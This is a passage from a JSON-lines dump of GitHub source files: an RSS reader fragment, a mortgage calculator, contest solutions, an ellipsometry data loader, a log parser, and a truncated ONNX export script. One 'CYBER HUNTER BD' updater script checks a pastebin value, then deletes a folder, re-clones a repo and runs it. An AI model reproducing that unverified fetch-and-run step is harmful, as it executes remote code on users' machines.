rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\n def run(self):\n self.getCon()\n return self.outputer()\n","repo_name":"cycoe/RSSReader","sub_path":"rssFetcher.py","file_name":"rssFetcher.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36213132488","text":"import time\r\n\r\ncasa = float(input('Qual o valor da casa em questão? R$'))\r\nsal = float(input('Qual o salário do comprador? R$'))\r\nanos = int(input('Em quantos anos EXATOS você deseja pagar? >'))\r\n\r\ntrintaPCen = sal * 0.3\r\n\r\nanoMes = anos * 12\r\nmensalidade = casa / anoMes\r\n\r\n\r\ncores = {'vermelho':'\\033[31m',\r\n 'limpo': '\\033[m',\r\n 'verde': '\\033[32m'}\r\n\r\nprint('\\033[97;40mCalculando...\\033[m')\r\ntime.sleep(2)\r\n\r\nif mensalidade > trintaPCen:\r\n print('{}Infelizmente{} o preço da parcela iria lhe causar prejuízo. \\n'\r\n 'Recomendamos aumentar o tempo das parcelas, ou procurar por outra opção.'.format(\r\n cores['vermelho'],cores['limpo']))\r\n\r\n print(cores['vermelho'])\r\n\r\nelse:\r\n print('{}Parabéns!{} O preço está em conta com o seu salário.\\n'\r\n 'Em instantes disponibilizaremos um link e enviaremos para o seu email.\\n'\r\n 'AGUARDE!'.format(cores['verde'],cores['limpo']))\r\n\r\n print(cores['verde'])\r\n\r\ntime.sleep(1)\r\nprint('-='*30)\r\ntime.sleep(1)\r\nprint(f'Valor à pagar R${mensalidade:.2f}/mês, durante {anos} anos.')\r\nprint(f'•O valor máximo com base no seu salário é de {trintaPCen:.2f}')\r\nprint(cores['limpo'])","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/036.py","file_name":"036.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"129964661","text":"import sys\nfrom collections import Counter\n\ninput = sys.stdin.readline\n\ncounter = Counter()\nN = int(input())\nfor _ in range(N):\n s = input().strip()\n counter[s] += 1\nprint(sorted(counter.most_common(), key=lambda x:(-x[1], x[0]))[0][0])\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Hash/1302.py","file_name":"1302.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34311017350","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\"\nA basic representation of a 1D dataset\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom refnx._lib import possibly_open_file\nfrom pathlib import PurePath\n\npd.options.mode.chained_assignment = None\n\n\nclass DataSE(object):\n r\"\"\"\n A basic representation of a 1D dataset.\n\n Parameters\n ----------\n data : {str, file-like, Path, tuple of np.ndarray}, optional\n String pointing to a data file.\n Alternatively it is a tuple containing the data from which the dataset\n will be constructed. The tuple should have 4 members.\n\n - data[0] - Wavelength (nm)\n - data[1] - Angle of incidence (degree)\n - data[2] - Psi\n - data[3] - Delta\n\n `data` must be four long.\n All arrays must have the same shape.\n\n mask : array-like\n Specifies which data points are (un)masked. Must be broadcastable\n to the data. `Data1D.mask = None` clears the mask. 
If a mask value\n equates to `True`, then the point is included, if a mask value equates\n to `False` it is excluded.\n\n reflect_delta : bool\n Specifies whether delta values are reflected around 180 degrees\n (i.e., 360 - delta[delta > 180]), as is standard for some ellipsometry\n analysis packages (i.e., WVASE).\n\n Attributes\n ----------\n AOI : np.ndarray\n angle of incidence (degree)\n mask : np.ndarray\n mask\n filename : str or None\n The file the data was read from\n weighted : bool\n Whether the y data has uncertainties\n metadata : dict\n Information that should be retained with the dataset.\n \"\"\"\n\n def __init__(\n self, data=None, name=None, delimiter=\"\\t\", reflect_delta=False, **kwds\n ):\n self.filename = None\n\n self.delimiter = delimiter\n self.metadata = kwds\n self._wavelength = np.zeros(0)\n self._aoi = np.zeros(0)\n self._psi = np.zeros(0)\n self._delta = np.zeros(0)\n # TODO when we come up with measurement uncertainties change this.\n self.weighted = False\n self.name = name\n\n # If a file, then open and load the file.\n if (\n hasattr(data, \"read\")\n or type(data) is str\n or isinstance(data, PurePath)\n ):\n self.load(data)\n self.filename = data\n\n # If already a DataSE object, then just use that.\n elif isinstance(data, DataSE):\n self.name = data.name\n self.filename = data.filename\n self.metadata = data.metadata\n self._wavelength = data._wavelength\n self._aoi = data._aoi\n self._psi = data._psi\n self._delta = data._delta\n\n # If a list or tuple, then assume its in format wavelength, AOI, psi, delta.\n elif isinstance(data, (list, tuple, np.ndarray)):\n self._wavelength = data[0]\n self._aoi = data[1]\n self._psi = data[2]\n self._delta = data[3]\n\n self._delta_flipped = False\n if reflect_delta:\n dmask = self._delta > 180\n self._delta[dmask] = 360 - self._delta[dmask]\n self._delta_flipped = True\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def __len__(self):\n \"\"\"Number of unmasked points in the dataset.\"\"\"\n return self.wavelength.size\n\n def __str__(self):\n return \"<{0}>, {1} points\".format(self.name, len(self))\n\n def __repr__(self):\n msk = self.mask\n if np.all(self.mask):\n msk = None\n\n d = {\"filename\": self.filename, \"msk\": msk, \"data\": self.data}\n if self.filename is not None:\n return \"Data1D(data={filename!r},\" \" mask={msk!r})\".format(**d)\n else:\n return \"Data1D(data={data!r},\" \" mask={msk!r})\".format(**d)\n\n def unique_wavelength_data(self):\n \"\"\"\n Generator yielding wavelength, AOI, psi, delta tuples for the unique\n wavelengths in a dataset (i.e. 
all the data points for a given\n wavelength)\n\n Returns\n -------\n wavelength, AOI, psi, delta\n \"\"\"\n unique_wavs = np.unique(self.wavelength)\n for unique_wav in unique_wavs:\n loc = np.where(self.wavelength == unique_wav)\n yield unique_wav, self.aoi[loc], self.psi[loc], self.delta[loc]\n\n @property\n def wavelength(self):\n \"\"\"wavelength(nm)\"\"\"\n\n if self._wavelength.size > 0:\n return self._wavelength[self.mask]\n else:\n return self._wavelength\n\n @property\n def aoi(self):\n \"\"\"Angle of incidence.\"\"\"\n if self._aoi.size > 0:\n return self._aoi[self.mask]\n else:\n return self._aoi\n\n @property\n def psi(self):\n \"\"\"Ellipsometric parameter psi.\"\"\"\n if self._psi.size > 0:\n return self._psi[self.mask]\n else:\n return self._psi\n\n @property\n def delta(self):\n \"\"\"Ellipsometric parameter delta.\"\"\"\n if self._delta.size > 0:\n return self._delta[self.mask]\n else:\n return self._delta\n\n @property\n def data(self):\n \"\"\"4-tuple containing the (wavelength), AOI, psi, delta) data.\"\"\"\n return self.wavelength, self.aoi, self.psi, self.delta\n\n @data.setter\n def data(self, data_tuple):\n \"\"\"\n Set the data for this object from the supplied data.\n\n Parameters\n ----------\n data_tuple : tuple\n 4 member tuple containing the (wav, aoi, psi, delta) data to\n specify the dataset.\n\n Notes\n -----\n Clears the mask for the dataset, it will need to be reapplied.\n\n \"\"\"\n self._wavelength = np.array(data_tuple[0], dtype=float)\n self._aoi = np.array(data_tuple[1], dtype=float)\n self._psi = np.array(data_tuple[2], dtype=float)\n self._delta = np.array(data_tuple[3], dtype=float)\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def save(self, f):\n \"\"\"\n Save the data to file. Saves the data as a 4 column ASCII file.\n\n Parameters\n ----------\n f : file-handle or string\n File to save the dataset to.\n\n \"\"\"\n header = \"wavelength\\tAOI\\tPsi\\tDelta\"\n np.savetxt(\n f,\n np.column_stack(\n (self._wavelength, self._aoi, self._psi, self._delta)\n ),\n delimiter=\"\\t\",\n header=header,\n )\n\n def load(self, f):\n \"\"\"\n Load a dataset from file.\n Must be a 4 column ASCII file with columns [wavelength, AOI, Psi, Delta].\n\n Parameters\n ----------\n f : file-handle or string\n File to load the dataset from.\n\n \"\"\"\n\n skip_lines = 0\n with possibly_open_file(f, \"r\") as text:\n for i in range(100): # check the first 100 lines\n try:\n float(text.readline().split(self.delimiter)[0])\n break\n except ValueError:\n skip_lines += 1\n\n self._wavelength, self._aoi, self._psi, self._delta = np.loadtxt(\n f, skiprows=skip_lines, delimiter=self.delimiter, encoding=\"utf8\"\n ).T\n\n def refresh(self):\n \"\"\"\n Refreshes a previously loaded dataset.\n\n \"\"\"\n if self.filename is not None:\n with open(self.filename) as f:\n self.load(f)\n\n\ndef open_EP4file(fname, reflect_delta=False):\n \"\"\"\n Open and load in an Accurion EP4 formmated data file.\n Typically a .dat file.\n\n Note: This file parser has been written for specific Accurion ellipsometers\n EP3 and EP4. No work has been done to ensure it is compatible with all\n Accurion ellipsometers. 
If you have trouble with this parser contact the\n maintainers through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n Returns\n ----------\n datasets : DataSE structure\n Structure containing wavelength, angle of incidence, psi and delta.\n\n\n \"\"\"\n df = pd.read_csv(fname, sep=\"\\t\", skiprows=[1])\n df = df.dropna(axis=0, how=\"any\")\n # normally the NaN are at the end of the file, but they can also be in\n # the middle\n df = df.reset_index()\n\n try:\n df[\"Time\"]\n time_data = True\n except KeyError:\n time_data = False\n print(\"No time data.\")\n\n if time_data and len(df[\"Time\"].drop_duplicates()) > 1:\n print(\"Treating as time series:\")\n output = []\n for t in df[\"Time\"].drop_duplicates():\n tdf = df[df[\"Time\"] == t]\n output += _loadEP4(tdf) # not sure if this will work\n output[-1][\"time\"] = t\n else:\n output = _loadEP4(df)\n for op in output:\n op[\"time\"] = None\n\n datasets = []\n for op in output:\n data = [op[\"lambda\"], op[\"aoi\"], op[\"psi\"], op[\"delta\"]]\n del op[\"lambda\"]\n del op[\"aoi\"]\n del op[\"psi\"]\n del op[\"delta\"]\n name = _make_EP4dname(fname, op)\n datasets.append(\n DataSE(data, name=name, reflect_delta=reflect_delta, **op)\n )\n\n if len(datasets) == 1:\n return datasets[0]\n else:\n return datasets\n\n\ndef _make_EP4dname(name, metadata):\n \"\"\"\n Create a helpful name for a data set based on an Accurion EP4\n formatted data file.\n\n Parameters\n ----------\n name : file-handle or string\n File name of data set.\n\n metadata : dict\n Dict containinng 'X pos', 'Y pos' and 'time' data.\n\n Returns\n ----------\n base : string\n Helpful name for the data set.\n\n \"\"\"\n name = str(name)\n base = name[: -len(\"_20200929-083122.ds.dat\")]\n if metadata[\"X pos\"] is not None:\n base += f\"_x={metadata['X pos']}mm_y={metadata['Y pos']}mm\"\n if metadata[\"time\"] is not None:\n base += f\"_t={metadata['time']}s\"\n return base\n\n\ndef custom_round(x, base=0.25):\n \"\"\"\n Perform rounding to a particular base. 
Default base is 0.25.\n\n Parameters\n ----------\n x : DataFrame, array or list\n Data to be rounded.\n\n base : float\n Base that the rounding will be with respect to.\n\n Returns\n ----------\n Result of cutsom round : np.array\n\n \"\"\"\n x = np.array(x, dtype=float)\n return np.round((base * np.round(x / base)), 2)\n\n\ndef _loadEP4(df):\n \"\"\"\n Specifically loading a data file created by an Accurion EP4 ellipsometer.\n Dataframe should have colums ['#Lambda','AOI','Psi','Delta'].\n Optionally can also have columns [X_pos, Y_pos].\n\n\n Parameters\n ----------\n df : DataFrame\n Data frame containing the wavelength, angle of incidence, psi and\n delta data.\n\n Returns\n ----------\n output : list of dicts\n Dicts containing wavelength, angle of indcidence, psi, delta and\n possible X pos and Y pos.\n\n \"\"\"\n\n try:\n df[\"X_pos\"]\n df[\"Y_pos\"]\n loc_data = True\n except KeyError:\n loc_data = False\n\n if loc_data and (\n len(df[\"X_pos\"].drop_duplicates()) > 1\n or len(df[\"Y_pos\"].drop_duplicates()) > 1\n ):\n xpos = np.nan\n ypos = np.nan\n\n area_indices = []\n for entry in df.iterrows():\n if (not np.allclose(xpos, entry[1][\"X_pos\"], atol=0.2)) or (\n not np.allclose(ypos, entry[1][\"Y_pos\"], atol=0.2)\n ):\n idx = entry[0]\n xpos = entry[1][\"X_pos\"]\n ypos = entry[1][\"Y_pos\"]\n area_indices.append(idx)\n area_indices.append(len(df))\n\n if len(area_indices) > 2:\n print(\"Treating as multiple locations\")\n else:\n print(\"Treating as single location\")\n\n output = []\n for i in range(len(area_indices) - 1):\n pdf = df.loc[area_indices[i] : area_indices[i + 1] - 1][\n [\"#Lambda\", \"AOI\", \"Psi\", \"Delta\", \"X_pos\", \"Y_pos\"]\n ]\n\n if len(pdf.index) > 0:\n ave_pos = pdf.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": np.round(np.mean(ave_pos[\"X_pos\"]), 2),\n \"Y pos\": np.round(np.mean(ave_pos[\"Y_pos\"]), 2),\n }\n output.append(summary)\n else:\n print(\"Treating as single location\")\n df = df[[\"#Lambda\", \"AOI\", \"Psi\", \"Delta\"]]\n ave_pos = df.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": None,\n \"Y pos\": None,\n }\n output = [summary]\n\n return output\n\n\ndef open_HORIBAfile(\n fname, reflect_delta=False, lambda_cutoffs=[-np.inf, np.inf]\n):\n \"\"\"\n Opening and loading in a data file created by a Horiba ellipsometer. Data\n file loaded should be of the Horiba file format .spe.\n\n Note: This file parser has been written for a specific ellipsometer, no\n work has been done to ensure it is compatable with all Horiba\n ellipsometers. 
If you have trouble with this parser contact the maintainers\n through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n lambda_cutoffs : list\n Specifies the minimum and maximum wavelengths of data to be loaded.\n List has length 2.\n\n Returns\n ----------\n DataSE : DataSE structure\n The data file structure from the loaded Horiba file.\n\n \"\"\"\n\n name = fname[:-4]\n metadata = {}\n linenodict = {}\n MDingest = False\n\n with open(fname, \"r\") as f:\n lines = f.readlines()\n\n for i, line in enumerate(lines):\n line = line.strip() # Drop newline character\n if not MDingest:\n if len(line) and line[0] == \"#\":\n MDlabel = \" \".join(line.split(\" \")[1:])[:-1]\n metadata[MDlabel] = []\n linenodict[MDlabel] = i\n MDingest = True\n\n else:\n if not len(line):\n MDingest = False\n if not len(\n metadata[MDlabel]\n ): # there is no metadata for entry\n metadata[MDlabel] = None # Set metadata to none\n elif len(metadata[MDlabel]) == 1: # there is only one entry\n metadata[MDlabel] = metadata[MDlabel][\n 0\n ] # remove data from list\n\n else: # there is metadata in the line\n metadata[MDlabel].append(\n line\n ) # append line to metadata entry\n\n data_df = pd.read_csv(\n fname,\n skiprows=linenodict[\"DATA\"] + 1,\n nrows=len(metadata[\"DATA\"]) - 1,\n encoding=\"ANSI\",\n delimiter=\" \",\n usecols=[\"nm\", \"Psi\", \"Delta\"],\n )\n\n AOI = float(metadata[\"INCIDENCE ANGLE\"][:5])\n data_df[\"AOI\"] = AOI * np.ones_like(data_df[\"nm\"])\n data_df = data_df[data_df[\"nm\"] > lambda_cutoffs[0]]\n data_df = data_df[data_df[\"nm\"] < lambda_cutoffs[1]]\n\n data = [data_df[\"nm\"], data_df[\"AOI\"], data_df[\"Psi\"], data_df[\"Delta\"]]\n\n return DataSE(data, name=name, reflect_delta=reflect_delta, **metadata)\n","repo_name":"refnx/refellips","sub_path":"refellips/dataSE.py","file_name":"dataSE.py","file_ext":"py","file_size_in_byte":16035,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"38786469785","text":"s = list(input())\n\nmax = 0\nfor i in range(len(s)):\n for j in reversed(range(len(s) + 1)):\n cnt = 0\n for k in range(i, j):\n if s[k] == \"A\" or s[k] == \"C\" or s[k] == \"G\" or s[k] == \"T\":\n cnt += 1\n else:\n cnt = 0\n break\n if max < cnt:\n max = cnt\nprint(max)\n","repo_name":"RuRey0310/Competitive_Programming","sub_path":"ABC100~150/ABC122/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13322755031","text":"import getpass,time,os,sys\nimport os \nab=\"1\"\nimport signal\nimport time,os,sys\nimport sys, random\nimport threading,time\nimport os,requests\nos.system(\"pip install mechanize \")\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\npink=\"\\x1b[95m\"\nblue=\"\\x1b[94m\"\nunderline='\\x1b[4m'\ncolouroff=\"\\x1b[00m\"\nimport os,sys,time,random\nprint(\"\")\nprint(\"\")\ncolor = [\"\\033[1;31m\",\"\\033[1;32m\", \"\\033[96m\", '\\33[93m' '\\33[94m']\nm = random.choice(color)+\"Update CK \"\nfor msg in m:\n 
sys.stdout.write(msg)\n sys.stdout.flush()\n time.sleep(0.09)\nprint(\"\")\n\nlogu=(pink+f\"\"\"\n\\t ____ _ _ ____\n\\t / ___| | | | | | __ )\n\\t| | | |_| | | _ \\ \"\"\"+colouroff+underline+\"\"\"CYBER HUNTER BD\"\"\"+colouroff+pink+\"\"\"\n\\t| |___ | _ | | |_) |\n\\t \\____| |_| |_| |____/ \n\\n\"\"\"+blue+\"\"\" Focous on Your Aim, You Will winner\"\"\")\n\n\nline=end+\"\\n__________________________________________________________\"\ndef a():\n\tprint(logu+\"\\n\\n\t\"+green+\" Developed By : MD ALAMIN CHOWDORY\"+green+\"\\n\\n \t\"+red+\" \\n\\n \"+line)\na()\n\nr=requests.get(\"https://pastebin.com/zHRgbXCi\").text\n\nr2=str(r)\n\nif ab==r2:\n pass\n os.system(\"python main.py\")\n \nelse:\n print(\"update This Tool \")\n \n os.system(\"cd $home && rm -rf chb && git clone https://github.com/CyberHanterBangladesh/chb \")\n \n","repo_name":"HIDDEN-VIRUS/chb","sub_path":"u.py","file_name":"u.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"69828021449","text":"# -*- coding=utf-8 -*-\r\n# author: zhihua.ye@spreadtrum.com\r\n\r\nimport sys\r\nimport os\r\n#sys.path.append('./')\r\n#print sys.path\r\nimport definition\r\nfrom config import *\r\nfrom lib.logConf import logConf\r\nfrom lib.logutils import logutils\r\nfrom helper.processmap import *\r\nfrom helper.excelhelper import *\r\nimport re\r\nfrom easygui import *\r\n\r\n#TODO list:\r\n#1. find pid by words\r\n#1.1 pid may change, process restart\r\n#2. unittest\r\n#3. decode flow\r\n#3.1 idea is different from old style:\r\n# media only need the process, simple is beautiful.\r\n# record start\r\n\r\n# record end\r\n# for phrase one:\r\n# 1. log grep\r\n# 2. data statistics\r\n# TODO: 3. vowifi video start/stop\r\n# FIXED: 4. 
call info\r\n# FIXED: record statistics, pps, sps,rtp\r\n# TODO: add simple UI.\r\n\r\nclass mflow:\r\n def __init__(self, logname='', outdir='./', loglevel='DEBUG'):\r\n self.log = os.path.realpath(logname)\r\n with open(self.log, 'rb') as logfile:\r\n self.loglines = logfile.readlines()\r\n self.logger = logConf(debuglevel=loglevel)\r\n self.logger.logger.info('init flow')\r\n self.config = config()\r\n self.logutils = logutils()\r\n\r\n logbasename = os.path.basename(logname)\r\n # get prefix, get timestamp\r\n prefix = logbasename.split('.')[0]\r\n self.version = self.config.getversion()\r\n #output is in one extra dir\r\n self.outdir = os.path.dirname(logname) + '/output'\r\n self.logutils.mkdirp(self.outdir)\r\n\r\n self.trimlog = self.outdir + '/' + prefix + '_' +self.logger.timestamp +'_media.log'\r\n with open(self.trimlog, 'a+')as trimlog:\r\n trimlog.truncate()\r\n\r\n self.excel = self.outdir + '/' + prefix + '_' +self.logger.timestamp +'_statictics.xlsx'\r\n\r\n #final eventmsg should be processed\r\n self.eventmsgs = list()\r\n\r\n #pid should be a verbose list\r\n self.pids = list()\r\n\r\n #call list\r\n self.calllist = list()\r\n\r\n #call number\r\n self.callnum = 0\r\n\r\n #Do we really need this F*cking global flag\r\n self.incall = False\r\n self.curcall = None\r\n\r\n def findPid(self):\r\n '''\r\n description: process may restart, so pid is a list\r\n :return:\r\n '''\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n #start to find pid\r\n for index, process in enumerate(ProcessList):\r\n key = process.getkey()\r\n name = process.getname()\r\n plist = process.getpidlist()\r\n if pid not in self.pids and self.logutils.patterninline(key, line):\r\n self.logger.logger.info('found id ' + str(pid) + ' for ' + name)\r\n self.pids.append(pid)\r\n plist.append(pid)\r\n\r\n\r\n def parse(self):\r\n '''\r\n 1. pass pid lines\r\n 2. pattern match\r\n 3. pattern handler\r\n 4. 
draw the graph, csv,\r\n :return:\r\n '''\r\n #find all pids\r\n self.findPid()\r\n\r\n #handle each patten by pid\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n for index, process in enumerate(ProcessList):\r\n plist = process.getpidlist()\r\n pevent = process.getpevent()\r\n if pid in plist:\r\n #then we handle the event\r\n elist = pevent.geteventlist()\r\n for eindex, event in enumerate(elist):\r\n key = event['key']\r\n groupnum = event['groupnum']\r\n color = event['color']\r\n eventHandler = event['eventHandler']\r\n\r\n regex = re.compile(key)\r\n result = regex.search(line)\r\n if result:\r\n #redirect output\r\n with open(self.trimlog, 'a+') as trimlog:\r\n trimlog.write(line)\r\n\r\n #start to handle event, pass the mflow instance\r\n handlerobj = eventHandler(result, color, groupnum, mflow=self, fruit=fruit)\r\n eventdict = handlerobj.getret()\r\n\r\n def dumpcalllist(self):\r\n self.logger.logger.info('Totally Call number is ' + str(self.callnum))\r\n for cindex, call in enumerate(self.calllist):\r\n call.dumpcall()\r\n\r\n def gensummarysheet(self,sheet):\r\n # gen header\r\n sheet.title = \"Summary\"\r\n #header = ['No.', 'Codec', 'CVO/id', 'fps', 'Resolution', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n header = ['No.', 'Codec', 'CVO/id', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n sheet.append(header)\r\n for cindex, call in enumerate(self.calllist):\r\n onerow = list()\r\n onerow.append(cindex+1)\r\n # add codec info\r\n onerow.append(call.codec['name'] +'/' + call.codec['payload'])\r\n onerow.append(call.codec['cvo'] + '/' + call.codec['cvoid'])\r\n #onerow.append(call.camerainfo['minfps'] + '->' + call.camerainfo['maxfps'])\r\n #onerow.append(call.camerainfo['width'] + 'x' + call.camerainfo['height'])\r\n\r\n onerow.append(call.time['start'])\r\n onerow.append(call.time['end'])\r\n onerow.append(call.time['duration'])\r\n onerow.append(call.time['firstpps'])\r\n onerow.append(call.time['firstsps'])\r\n sheet.append(onerow)\r\n adjuctcolumnsize(sheet)\r\n\r\n def exportexcel(self):\r\n # generate sheet named by VT_Call_number_sendstat/recvstat\r\n wb = Workbook()\r\n self.gensummarysheet(wb.active)\r\n\r\n # the first sheet is always sendstat of call 1\r\n for cindex, call in enumerate(self.calllist):\r\n #one call will have two sheets: send, recv\r\n realindex = cindex + 1\r\n self.logger.logger.info('start to handle call ' + str(realindex))\r\n\r\n firstws = wb.create_sheet(title=call.sendsheettitle(realindex))\r\n secondws = wb.create_sheet(title=call.recvsheettitle(realindex))\r\n\r\n call.gensendsheet(firstws)\r\n adjuctcolumnsize(firstws)\r\n\r\n call.genrecvsheet(secondws)\r\n adjuctcolumnsize(secondws)\r\n\r\n wb.save(self.excel)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #mflow = mflow(logname=\"./samplelog/main.log\")\r\n mflow = mflow(logname=\"./samplelog/751978/mo.log\")\r\n mflow.parse()\r\n mflow.dumpcalllist()\r\n mflow.exportexcel()\r\n pass\r\n","repo_name":"deevarvar/myLab","sub_path":"sprd/vowifi/mengine_parser/mflow_parser.py","file_name":"mflow_parser.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1840038200","text":"def plusOne(digits):\n if digits[0] == 9:\n digits.insert(0, 0)\n for i in range(len(digits)-1, -1, -1):\n if digits[i] != 9:\n digits[i] += 1\n break\n else:\n digits[i] = 0\n if digits[0] == 0:\n 
digits.remove(0)\n return digits\n\n\ndigits = [9, 9, 9]\nprint(plusOne(digits))\n\ndigits2 = [9,8,7,6,5,4,3,2,1,0]\nprint(plusOne(digits2))","repo_name":"morozooff/leetCode-solutions","sub_path":"easy/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11384117849","text":"import os\nimport sys\n\n\nroot_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['PYTHONPATH'] = f'\"{root_dir}\"'\nsys.path.insert(0, root_dir)\n\n\nimport argparse\nimport math\nimport re\nimport struct\nfrom functools import partial\n\nimport numpy as np\nimport onnx\nimport onnxsim\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nfrom torch.nn import Linear\n\nfrom modules.commons.common_layers import Mish\nfrom src.diff.net import AttrDict\nfrom utils import load_ckpt\nfrom utils.hparams import hparams, set_hparams\n\n\ndef extract(a, t):\n return a[t].reshape((1, 1, 1, 1))\n\n\ndef linear_beta_schedule(timesteps, max_beta=hparams.get('max_beta', 0.01)):\n \"\"\"\n linear schedule\n \"\"\"\n betas = np.linspace(1e-4, max_beta, timesteps)\n return betas\n\n\ndef cosine_beta_schedule(timesteps, s=0.008):\n \"\"\"\n cosine schedule\n as proposed in https://openreview.net/forum?id=-NEXDKk8gZ\n \"\"\"\n steps = timesteps + 1\n x = np.linspace(0, steps, steps)\n alphas_cumprod = np.cos(((x / steps) + s) / (1 + s) * np.pi * 0.5) ** 2\n alphas_cumprod = alphas_cumprod / alphas_cumprod[0]\n betas = 1 - (alphas_cumprod[1:] / alphas_cumprod[:-1])\n return np.clip(betas, a_min=0, a_max=0.999)\n\n\nbeta_schedule = {\n \"cosine\": cosine_beta_schedule,\n \"linear\": linear_beta_schedule,\n}\n\n\nclass SinusoidalPosEmb(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n half_dim = dim // 2\n emb = math.log(10000) / (half_dim - 1)\n self.register_buffer('emb', torch.exp(torch.arange(half_dim) * torch.tensor(-emb)).unsqueeze(0))\n\n def forward(self, x):\n emb = self.emb * x\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\nclass KaimingNormalConv1d(nn.Conv1d):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n nn.init.kaiming_normal_(self.weight)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, encoder_hidden, residual_channels, dilation):\n super().__init__()\n self.residual_channels = residual_channels\n self.dilated_conv = KaimingNormalConv1d(\n residual_channels,\n 2 * residual_channels,\n 3,\n padding=dilation,\n dilation=dilation)\n self.diffusion_projection = Linear(residual_channels, residual_channels)\n self.conditioner_projection = KaimingNormalConv1d(encoder_hidden, 2 * residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(residual_channels, 2 * residual_channels, 1)\n\n def forward(self, x, conditioner, diffusion_step):\n diffusion_step = self.diffusion_projection(diffusion_step).unsqueeze(-1)\n conditioner = self.conditioner_projection(conditioner)\n y = x + diffusion_step\n\n y = self.dilated_conv(y) + conditioner\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n gate, filter = torch.split(y, [self.residual_channels, self.residual_channels], dim=1)\n\n y = torch.sigmoid(gate) * torch.tanh(filter)\n y = self.output_projection(y)\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n residual, skip = torch.split(y, [self.residual_channels, self.residual_channels], 
dim=1)\n\n return (x + residual) / math.sqrt(2.0), skip\n\n\nclass DiffNet(nn.Module):\n def __init__(self, in_dims=80):\n super().__init__()\n self.params = params = AttrDict(\n # Model params\n encoder_hidden=hparams['hidden_size'],\n residual_layers=hparams['residual_layers'],\n residual_channels=hparams['residual_channels'],\n dilation_cycle_length=hparams['dilation_cycle_length'],\n )\n self.input_projection = KaimingNormalConv1d(in_dims, params.residual_channels, 1)\n self.diffusion_embedding = SinusoidalPosEmb(params.residual_channels)\n dim = params.residual_channels\n self.mlp = nn.Sequential(\n nn.Linear(dim, dim * 4),\n Mish(),\n nn.Linear(dim * 4, dim)\n )\n self.residual_layers = nn.ModuleList([\n ResidualBlock(params.encoder_hidden, params.residual_channels, 2 ** (i % params.dilation_cycle_length))\n for i in range(params.residual_layers)\n ])\n self.skip_projection = KaimingNormalConv1d(params.residual_channels, params.residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(params.residual_channels, in_dims, 1)\n nn.init.zeros_(self.output_projection.weight)\n\n # TODO: swap order of `diffusion_steps` and `cond`\n def forward(self, spec, diffusion_step, cond):\n \"\"\"\n\n :param spec: [B, 1, M, T]\n :param diffusion_step: [B, 1]\n :param cond: [B, M, T]\n 